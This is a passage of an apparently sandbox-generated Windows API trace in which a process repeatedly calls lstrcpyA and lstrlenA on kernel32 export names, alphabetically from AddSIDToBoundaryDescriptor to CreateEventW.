returned="AddSIDToBoundaryDescriptor" [0087.427] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.427] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.427] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.427] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.427] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.427] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.427] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.427] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.427] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.428] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.428] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.428] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.428] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.428] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.428] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.428] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.428] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.428] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.428] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.428] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.428] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.428] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.428] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.428] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.428] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.428] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.428] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.429] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.429] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.429] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.429] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.429] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.429] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.429] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.429] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.429] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.429] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.429] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.429] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.429] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.429] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.429] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.429] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.429] lstrlenA (lpString="BEEP") returned 4 [0087.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.429] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.430] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.430] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.430] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.430] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.430] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.430] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.430] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.430] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.430] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.430] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.430] lstrlenA (lpString="CANCELIO") returned 8 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.430] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.430] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.430] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.430] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.430] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.430] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.430] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.431] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.431] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.431] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.431] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.431] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.431] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.431] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.431] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.431] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.431] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.431] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.431] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.431] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.431] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.431] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.431] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.431] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.431] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.431] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.432] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.432] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.432] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.432] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.432] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.432] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.432] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.432] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.432] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.432] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.432] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.432] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.432] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.432] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.432] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.432] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.432] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.432] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.432] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.433] lstrlenA (lpString="COPYFILEA") returned 9 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.433] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.433] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.433] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.433] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.433] lstrlenA (lpString="COPYFILEW") returned 9 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.433] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.433] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.433] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.433] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.433] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.433] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.433] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.433] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.433] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.433] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.433] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.433] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.434] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.434] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.434] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.434] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.434] lstrcpyA 